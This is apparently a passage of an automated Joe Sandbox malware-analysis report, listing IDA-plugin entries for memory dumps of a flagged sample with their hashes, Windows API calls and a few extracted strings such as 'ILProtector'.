                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Variant$ArrayClearSafe$Init$CreateDestroyElementVectorXweakstd::tr1::_
                                                                                          • String ID:
                                                                                          • API String ID: 1774866819-0
                                                                                          • Opcode ID: cc5727b2629deb3d238ef06c24d00d556c2ee6e9326bad0d77fa9fd16e7d905d
                                                                                          • Instruction ID: 365909309ad173f3f468b543782ae97fbf2af49f64a12e6681035891403674cd
                                                                                          • Opcode Fuzzy Hash: cc5727b2629deb3d238ef06c24d00d556c2ee6e9326bad0d77fa9fd16e7d905d
                                                                                          • Instruction Fuzzy Hash: FEB13875600609AFDB14DF98C884EBAB7F9BF8D310F15856CE50AAB791DA34F841CB60
                                                                                          APIs
                                                                                          • VariantInit.OLEAUT32(?), ref: 6D02C56F
                                                                                          • VariantInit.OLEAUT32(?), ref: 6D02C575
                                                                                          • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6D02C580
                                                                                          • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6D02C5B5
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D02C5C1
                                                                                          • std::tr1::_Xweak.LIBCPMT ref: 6D02C7D4
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02C7F1
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D02C801
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D02C807
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Variant$ArrayClearSafe$Init$CreateDestroyElementVectorXweakstd::tr1::_
                                                                                          • String ID:
                                                                                          • API String ID: 1774866819-0
                                                                                          • Opcode ID: e0d15d691de598d03b70e9f92beba34e6d231a1471fc16714cd1992fa4eac9cb
                                                                                          • Instruction ID: 92d8073afdbde6e9330700f25d88a323657c9fafda5711d447b82051a06b6dc7
                                                                                          • Opcode Fuzzy Hash: e0d15d691de598d03b70e9f92beba34e6d231a1471fc16714cd1992fa4eac9cb
                                                                                          • Instruction Fuzzy Hash: 9FA1397560060AAFDB14DF98C884EAAB7F9BF8D310F15856CE506AB791DB34F841CB60
                                                                                          APIs
                                                                                          • VariantInit.OLEAUT32(?), ref: 6D0268B2
                                                                                          • VariantInit.OLEAUT32(?), ref: 6D0268BD
                                                                                          • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6D0268D7
                                                                                          • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6D0268FD
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D026909
                                                                                          • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6D026923
                                                                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 6D026981
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D02699E
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D0269A4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Variant$ArraySafe$Clear$ElementInit$CreateDestroyVector
                                                                                          • String ID:
                                                                                          • API String ID: 3529038988-0
                                                                                          • Opcode ID: 21a65ee27d4049effc1de2d143c89a7934e5d665541e94fc307c735fda053aad
                                                                                          • Instruction ID: c15f1eeaa70cc996946e4d38e0c3be4adbbaa4e22edc1b7e0eed0d19e8b5b0b6
                                                                                          • Opcode Fuzzy Hash: 21a65ee27d4049effc1de2d143c89a7934e5d665541e94fc307c735fda053aad
                                                                                          • Instruction Fuzzy Hash: 8A4161B2900209AFDF00DFA4C884BEEBBBDFF99710F154119E905A7240E775E905CBA0
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Variant$ClearInit
                                                                                          • String ID:
                                                                                          • API String ID: 2610073882-0
                                                                                          • Opcode ID: 8a4b6a4b30ae04fb0fbdde8ed54087d55569804dbe94109af0b34c60f49eb967
                                                                                          • Instruction ID: c7c9b291a7dccb8b84b97e93defa746b18c600417d54be310002838f45e29072
                                                                                          • Opcode Fuzzy Hash: 8a4b6a4b30ae04fb0fbdde8ed54087d55569804dbe94109af0b34c60f49eb967
                                                                                          • Instruction Fuzzy Hash: CAC146716087019FE301DFA8C880A2AF7E5FFC9704F248A5DF9989B265D731E845CB96
                                                                                          APIs
                                                                                          • SafeArrayGetLBound.OLEAUT32(00000000,?,?), ref: 6D026C8B
                                                                                          • SafeArrayGetUBound.OLEAUT32(00000000,?,?), ref: 6D026CA6
                                                                                          • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 6D026CC7
                                                                                            • Part of subcall function 6D025760: std::tr1::_Xweak.LIBCPMT ref: 6D025769
                                                                                          • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 6D026CF9
                                                                                            • Part of subcall function 6D069BB5: _malloc.LIBCMT ref: 6D069BCF
                                                                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 6D026F13
                                                                                          • InterlockedCompareExchange.KERNEL32(6D0AC6A4,45524548,4B4F4F4C), ref: 6D026F34
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArraySafe$BoundData$AccessCompareDestroyExchangeInterlockedUnaccessXweak_mallocstd::tr1::_
                                                                                          • String ID:
                                                                                          • API String ID: 2722669376-0
                                                                                          • Opcode ID: 905ee3f90f0f2e89a0b19484df78ca1cde11c7158d72f40e3a2a5ae4e72219d9
                                                                                          • Instruction ID: 305b69ec9f965e8cd9aeae92020f224132c5d06a904126755183ee12e03d1991
                                                                                          • Opcode Fuzzy Hash: 905ee3f90f0f2e89a0b19484df78ca1cde11c7158d72f40e3a2a5ae4e72219d9
                                                                                          • Instruction Fuzzy Hash: CFD1D075A052069FFF11CFA4CC94BAE77F8AF45304F568469EA05AB285D774E800CBE1
                                                                                          APIs
                                                                                            • Part of subcall function 6D069BB5: _malloc.LIBCMT ref: 6D069BCF
                                                                                          • std::tr1::_Xweak.LIBCPMT ref: 6D011B53
                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 6D011B5D
                                                                                          • std::exception::exception.LIBCMT ref: 6D011C43
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D011C58
                                                                                          Strings
                                                                                          • invalid vector<T> subscript, xrefs: 6D011B58
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Exception@8ThrowXinvalid_argumentXweak_mallocstd::_std::exception::exceptionstd::tr1::_
                                                                                          • String ID: invalid vector<T> subscript
                                                                                          • API String ID: 3098024973-3016609489
                                                                                          • Opcode ID: 957ac6aba7bdacc19855007cfd72dde4571b49fa675d28564f797c67e3dd7a69
                                                                                          • Instruction ID: 484df883bae84afc497fd4bc4ef81997553af5adafb00e21a11b4c4936bd6091
                                                                                          • Opcode Fuzzy Hash: 957ac6aba7bdacc19855007cfd72dde4571b49fa675d28564f797c67e3dd7a69
                                                                                          • Instruction Fuzzy Hash: 30225B75C0430A9FDB24CFE4C480AEEBBF5BF44314F118A5DD55AAB650E774AA88CB90
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1763634407.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2eb0000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: (o^q$(o^q$,bq$,bq$Hbq$d8cq
                                                                                          • API String ID: 0-1626189073
                                                                                          • Opcode ID: cb8397bf5d815a8f1af17671fae74dc1984980c73fef138fe546de1dae2221fd
                                                                                          • Instruction ID: 9feff3fae2059de66e8abcbfa8c55b7721dd46dcf22dccb12f14e97517d83d7d
                                                                                          • Opcode Fuzzy Hash: cb8397bf5d815a8f1af17671fae74dc1984980c73fef138fe546de1dae2221fd
                                                                                          • Instruction Fuzzy Hash: 9FC14D34B401188FCB159F69D958AAF7BF6BF88348F149469E905EB3A0DB30DC41CB91
                                                                                          APIs
                                                                                          • VariantInit.OLEAUT32(6D0231EC), ref: 6D01DB5E
                                                                                          • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6D01DB6E
                                                                                          • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6D01DB82
                                                                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 6D01DBF1
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D01DBFB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArraySafe$Variant$ClearCreateDestroyElementInitVector
                                                                                          • String ID:
                                                                                          • API String ID: 182531043-0
                                                                                          • Opcode ID: d0ded9438e5aca6ae866570404eedd3958431eb8eafaafa49a1b412bdb0f18ec
                                                                                          • Instruction ID: 8a07f52cfa88e89e697b24028d29a11180b3993699606bb5714b772fd312650c
                                                                                          • Opcode Fuzzy Hash: d0ded9438e5aca6ae866570404eedd3958431eb8eafaafa49a1b412bdb0f18ec
                                                                                          • Instruction Fuzzy Hash: 78315E7AA04205AFDB00DF95C884FEEB7F9EF9A721F15815AE911A7340D735A901CBA0
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: T@12
                                                                                          • String ID: a0
                                                                                          • API String ID: 456891419-3188653782
                                                                                          • Opcode ID: 23701544b8d299c2de1e17a44fb7a57d6108f61da0f65b09e4f6c1ac8c684335
                                                                                          • Instruction ID: 63b74e9b4318c0308271bfbf20c259434ca947b5f0fa4518836104f86d8e1407
                                                                                          • Opcode Fuzzy Hash: 23701544b8d299c2de1e17a44fb7a57d6108f61da0f65b09e4f6c1ac8c684335
                                                                                          • Instruction Fuzzy Hash: 6311FE70D452A76AFB20BAB68C4CF7BBAFCEFC2754F219414A525E7141D728C941CAB0
                                                                                          APIs
                                                                                          • _malloc.LIBCMT ref: 6D069BCF
                                                                                            • Part of subcall function 6D069D66: __FF_MSGBANNER.LIBCMT ref: 6D069D7F
                                                                                            • Part of subcall function 6D069D66: __NMSG_WRITE.LIBCMT ref: 6D069D86
                                                                                            • Part of subcall function 6D069D66: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,00000000,?,6D069BD4,6D001290,4E8A916F), ref: 6D069DAB
                                                                                          • std::exception::exception.LIBCMT ref: 6D069C04
                                                                                          • std::exception::exception.LIBCMT ref: 6D069C1E
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D069C2F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                                          • String ID:
                                                                                          • API String ID: 615853336-0
                                                                                          • Opcode ID: 17a39b3a40cfd9c3b41b28bcee23fce8b146182ad16b5779d8861d95add6aa4b
                                                                                          • Instruction ID: 19f19a382ab99582958ac4ae3c8156e5fef3391101b43845766f053ab35b499b
                                                                                          • Opcode Fuzzy Hash: 17a39b3a40cfd9c3b41b28bcee23fce8b146182ad16b5779d8861d95add6aa4b
                                                                                          • Instruction Fuzzy Hash: 7FF0C23140458EAEFF00EBA4ED10BAD7AF9AF42728F190419E50097692DFB08A45D7B1
                                                                                          APIs
                                                                                          • SafeArrayCreateVector.OLEAUT32(00000011,00000000,00000000), ref: 6D016C73
                                                                                          • SafeArrayAccessData.OLEAUT32(00000000,6D016C3C), ref: 6D016C87
                                                                                          • _memmove.LIBCMT ref: 6D016C9A
                                                                                          • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 6D016CA3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArraySafe$Data$AccessCreateUnaccessVector_memmove
                                                                                          • String ID:
                                                                                          • API String ID: 3147195435-0
                                                                                          • Opcode ID: 7a275b094932e2f6942b50a9aa41c938e7e5bd31b3133f6c00552c04707ba9e3
                                                                                          • Instruction ID: 19fb91f07377fb4f7974db1e31e81cb0018aef990084f111fda87af35ec3d35a
                                                                                          • Opcode Fuzzy Hash: 7a275b094932e2f6942b50a9aa41c938e7e5bd31b3133f6c00552c04707ba9e3
                                                                                          • Instruction Fuzzy Hash: E2F0FE75204218BBEF10AF95DC89F977BADEF9A766F018015FA188B240E771D5009BB1
                                                                                          APIs
                                                                                            • Part of subcall function 6D069BB5: _malloc.LIBCMT ref: 6D069BCF
                                                                                          • std::exception::exception.LIBCMT ref: 6D032206
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D032221
                                                                                            • Part of subcall function 6D036480: __CxxThrowException@8.LIBCMT ref: 6D036518
                                                                                            • Part of subcall function 6D036480: __CxxThrowException@8.LIBCMT ref: 6D036558
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Exception@8Throw$_mallocstd::exception::exception
                                                                                          • String ID: ILProtector
                                                                                          • API String ID: 84431791-1153028812
                                                                                          • Opcode ID: 3f4841735bd6884a78fb4707834ea61924aa4096d9451e29faf42ae6fafce360
                                                                                          • Instruction ID: faa55d19cf99a365876fb92a6aae8b9dab3bb42bd4ec463c1c1f3eea3c79a94f
                                                                                          • Opcode Fuzzy Hash: 3f4841735bd6884a78fb4707834ea61924aa4096d9451e29faf42ae6fafce360
                                                                                          • Instruction Fuzzy Hash: 8B712875909259DFDB24CFA8C844BEEBBB4FB49300F1581AAD51AA7341DB306A44CFA1
                                                                                          APIs
                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6D01913B
                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6D01915C
                                                                                          • EnterCriticalSection.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 6D019170
                                                                                          • LeaveCriticalSection.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 6D019191
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: CriticalSection$EnterLeave
                                                                                          • String ID:
                                                                                          • API String ID: 3168844106-0
                                                                                          • Opcode ID: 7f373a0f620d4aa4cd29d1061e72079316845e49b4069bc2989eebdd8db1586f
                                                                                          • Instruction ID: 9df15a390fbf57231789cd7b443bcf2c5f7a79aba63b18ca23dd8b7d974b7a3d
                                                                                          • Opcode Fuzzy Hash: 7f373a0f620d4aa4cd29d1061e72079316845e49b4069bc2989eebdd8db1586f
                                                                                          • Instruction Fuzzy Hash: 0B4130769042099FDB04DF99D9849EEBBF5FF89310B11855ED926AB200D730EA05CFA1
                                                                                          APIs
                                                                                          • EnterCriticalSection.KERNEL32 ref: 6D018E89
                                                                                          • LeaveCriticalSection.KERNEL32(?,00000000), ref: 6D018EAD
                                                                                          • _memset.LIBCMT ref: 6D018ED2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: CriticalSection$EnterLeave_memset
                                                                                          • String ID:
                                                                                          • API String ID: 3751686142-0
                                                                                          • Opcode ID: 603c16a7f228876de8e1546f7b214271ee616a75943d3018879128f40367e7d2
                                                                                          • Instruction ID: 08838a36cbecb08b513d5eda3277778d8df86e7635e796371af42d141699c855
                                                                                          • Opcode Fuzzy Hash: 603c16a7f228876de8e1546f7b214271ee616a75943d3018879128f40367e7d2
                                                                                          • Instruction Fuzzy Hash: 89515CB4A04205AFDB08CF98C890F6AB7B6FF89304F11855DE91A9B781D731EE55CB90
                                                                                          APIs
                                                                                          • SafeArrayCreateVector.OLEAUT32(0000000D,00000000,00000002), ref: 6D01D949
                                                                                          • SafeArrayPutElement.OLEAUT32(00000000,?,00000000), ref: 6D01D96C
                                                                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 6D01D9CF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArraySafe$CreateDestroyElementVector
                                                                                          • String ID:
                                                                                          • API String ID: 3149346722-0
                                                                                          • Opcode ID: 47068afe6b398f81a5fef9099912a0801232449f30a648780b9fc6c9dc7a2f7a
                                                                                          • Instruction ID: 86ef9455a07bcaccf3c0c48b01909d4c1643aea12948772c896ee1b5bf52aa18
                                                                                          • Opcode Fuzzy Hash: 47068afe6b398f81a5fef9099912a0801232449f30a648780b9fc6c9dc7a2f7a
                                                                                          • Instruction Fuzzy Hash: 6A214A75604219AFEB11CF98CC84FAB77A9EF8A740F104198E945DB244D7B1E901CBB1
                                                                                          APIs
                                                                                          • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6D02DB2D
                                                                                          • SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6D02DB45
                                                                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 6D02DBA2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArraySafe$CreateDestroyElementVector
                                                                                          • String ID:
                                                                                          • API String ID: 3149346722-0
                                                                                          • Opcode ID: 3fb8620754b294a669f4f9415037934e68b15ba9ac2049ffe5ec3e7d7e7e0d50
                                                                                          • Instruction ID: 7506d96f46850b0d1672e40e097574bc37d4a6611147d4311e2c51b91ab04fac
                                                                                          • Opcode Fuzzy Hash: 3fb8620754b294a669f4f9415037934e68b15ba9ac2049ffe5ec3e7d7e7e0d50
                                                                                          • Instruction Fuzzy Hash: F4118E75642205AFEB00DF69C898F9ABBB8BF5A311F048159E9089B301D730E800CBE0
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: _malloc
                                                                                          • String ID: |m
                                                                                          • API String ID: 1579825452-3988610331
                                                                                          • Opcode ID: 841bb0086536baf03996fe898c6dd0cb0a383e6086b28637b1532409c8f6a4dc
                                                                                          • Instruction ID: fe1c9d0f26096f5a7afb66456d61fb309aed0a2b9d39d4983653be0bbd094221
                                                                                          • Opcode Fuzzy Hash: 841bb0086536baf03996fe898c6dd0cb0a383e6086b28637b1532409c8f6a4dc
                                                                                          • Instruction Fuzzy Hash: 9D817EB198D3828FFB20DFB4D89571EB7E0BB41304F56496ED248CB291E77598448B63
                                                                                          APIs
                                                                                            • Part of subcall function 6D069BB5: _malloc.LIBCMT ref: 6D069BCF
                                                                                          • std::exception::exception.LIBCMT ref: 6D034042
                                                                                            • Part of subcall function 6D069533: std::exception::_Copy_str.LIBCMT ref: 6D06954E
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D034059
                                                                                            • Part of subcall function 6D06AC75: RaiseException.KERNEL32(?,?,6D069C34,4E8A916F,?,?,?,?,6D069C34,4E8A916F,6D099C90,6D0AB974,4E8A916F), ref: 6D06ACB7
                                                                                            • Part of subcall function 6D069BB5: std::exception::exception.LIBCMT ref: 6D069C04
                                                                                            • Part of subcall function 6D069BB5: std::exception::exception.LIBCMT ref: 6D069C1E
                                                                                            • Part of subcall function 6D069BB5: __CxxThrowException@8.LIBCMT ref: 6D069C2F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: std::exception::exception$Exception@8Throw$Copy_strExceptionRaise_mallocstd::exception::_
                                                                                          • String ID:
                                                                                          • API String ID: 2813683038-0
                                                                                          • Opcode ID: 1b3566bec9514ab041cef035d815aca31b117e30f0a5129a8791392c23c470d2
                                                                                          • Instruction ID: 56f6ac41a5fe63b0855bf49d379afc80350dc786c9b291b9f86fb184cafd0ee5
                                                                                          • Opcode Fuzzy Hash: 1b3566bec9514ab041cef035d815aca31b117e30f0a5129a8791392c23c470d2
                                                                                          • Instruction Fuzzy Hash: E391D3B1908701AFE701CF99D885B5EFBF8FF84340F16895AE5149B290E7B1D500CBA2
                                                                                          APIs
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D01BE2D
                                                                                          • IsBadReadPtr.KERNEL32(00000000,00000008,?,?,?), ref: 6D01BE6D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArrayDestroyReadSafe
                                                                                          • String ID:
                                                                                          • API String ID: 616443815-0
                                                                                          • Opcode ID: ebf947a88d1877b22ab9e8c5092481bb7d1ea791355dccaf1e2e4d379fa97e30
                                                                                          • Instruction ID: 51a07c98c7603a2e27472123cb9983b0a595ce6c4261573e4dd53d5852c5a496
                                                                                          • Opcode Fuzzy Hash: ebf947a88d1877b22ab9e8c5092481bb7d1ea791355dccaf1e2e4d379fa97e30
                                                                                          • Instruction Fuzzy Hash: 4C71BCB090C6975EFB218EA98C40779BBF1BB4B224F18839CD9A597396C731D442CB51
                                                                                          APIs
                                                                                            • Part of subcall function 6D069BB5: _malloc.LIBCMT ref: 6D069BCF
                                                                                          • std::exception::exception.LIBCMT ref: 6D016466
                                                                                            • Part of subcall function 6D069533: std::exception::_Copy_str.LIBCMT ref: 6D06954E
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D01647D
                                                                                            • Part of subcall function 6D06AC75: RaiseException.KERNEL32(?,?,6D069C34,4E8A916F,?,?,?,?,6D069C34,4E8A916F,6D099C90,6D0AB974,4E8A916F), ref: 6D06ACB7
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
                                                                                          • String ID:
                                                                                          • API String ID: 2299493649-0
                                                                                          • Opcode ID: 67a28b8cd5e09b393766e6e22b896532a10d045da4b4ed90cb75cc566ce2e1ff
                                                                                          • Instruction ID: 8e5b174d7116d1c658d635a1018b76c9c9833799e5ef8c4b3008e7df49c156c0
                                                                                          • Opcode Fuzzy Hash: 67a28b8cd5e09b393766e6e22b896532a10d045da4b4ed90cb75cc566ce2e1ff
                                                                                          • Instruction Fuzzy Hash: E6515AB190C3419FE700CF94DD85B5ABBE4BB85740F81492EFA998B290E771D904CBA3
                                                                                          APIs
                                                                                            • Part of subcall function 6D069BB5: _malloc.LIBCMT ref: 6D069BCF
                                                                                          • std::exception::exception.LIBCMT ref: 6D02D3E8
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D02D3FF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                                          • String ID:
                                                                                          • API String ID: 4063778783-0
                                                                                          • Opcode ID: 61480ed46764ec29323f96a085d3890115147b5878fe83168ed1b9ca04b6d2a2
                                                                                          • Instruction ID: 1d52bfe0a60cc3f4d97d82186efca2a0e7d324bfeca5845af7f42db170e0fcbf
                                                                                          • Opcode Fuzzy Hash: 61480ed46764ec29323f96a085d3890115147b5878fe83168ed1b9ca04b6d2a2
                                                                                          • Instruction Fuzzy Hash: 2A314A715097459FD704CF28D480A9ABBF4FF89714F508A2EF4558B790E731EA06CBA2
                                                                                          APIs
                                                                                            • Part of subcall function 6D069BB5: _malloc.LIBCMT ref: 6D069BCF
                                                                                          • std::exception::exception.LIBCMT ref: 6D018449
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D01845E
                                                                                          Memory Dump Source
